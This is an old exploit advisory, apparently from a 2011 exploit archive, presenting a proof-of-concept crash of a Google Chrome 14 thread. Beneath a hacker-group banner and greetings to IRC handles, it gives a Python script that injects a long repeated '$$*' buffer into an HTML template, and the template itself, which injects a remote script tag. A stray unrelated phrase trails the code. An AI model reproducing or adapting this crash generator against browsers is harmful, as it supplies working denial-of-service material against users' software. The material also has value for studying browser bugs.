## _(`-')_ pigtail23 (`-') (`-')_ _ www.remoteshell.de ## ## \-.(OO ) (_).-> ( OO).->(OO ).-/(_)<-.## ## _.'\ ,-(`-') ,---(`-')/'._/ ,---. ,-(`-'),--. ) .----..----.## ##(_...--'' | ( OO)'.-(OO )|'--...__)| \ /`.\| ( OO)|(`-')\_,-.|\_.-,| ## ##||_.' | ||)|| .-, \`--..--''-'|_.' | ||)||OO ) .' .'|_<## ##|.___.'(||_/ || '.(_/ ||(|.-.|(||_/(|'__ | .'/_ .-. \| ## ##||||'->|'-'||| || || ||'->| |'||\ `-'/ ## ##`--'`--'`-----' `--' `--' `--' `--' `-----' `------' `---''## ################################################################################### ################################################################################### October 22, 2011 Ohh nice! What u doing google? Thx 4 ur bug! 0__o Google Chrome PoC, killing thread. Exploitable or only a DOS!? Found no way to exploit it. Good Luck!!! Testsystem: WinXP SP3, Win7(64 bit) Google Chrome version: 14.0.835.202 Greetings to: mr_insecure, myownremote, noptrix, Eph, lnxg33k, CyberMaN,... TheXero, Dexter, #back-track.de and #intern0t @ irc.freenode.net ################################################################################### poc.html: too big! ################################################################################### Python script for debugging: #!/usr/bin/python filename = 'poc.html' content = open('template.html', 'r').read() buff = '$$*' * 36800 rc = 484 content2 = content[:rc] + buff + content[rc:] FILE = open(filename,"w") FILE.write(content2) FILE.close() ################################################################################### template.html: <html> <body> <script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script> </body> </html>
体验盒子
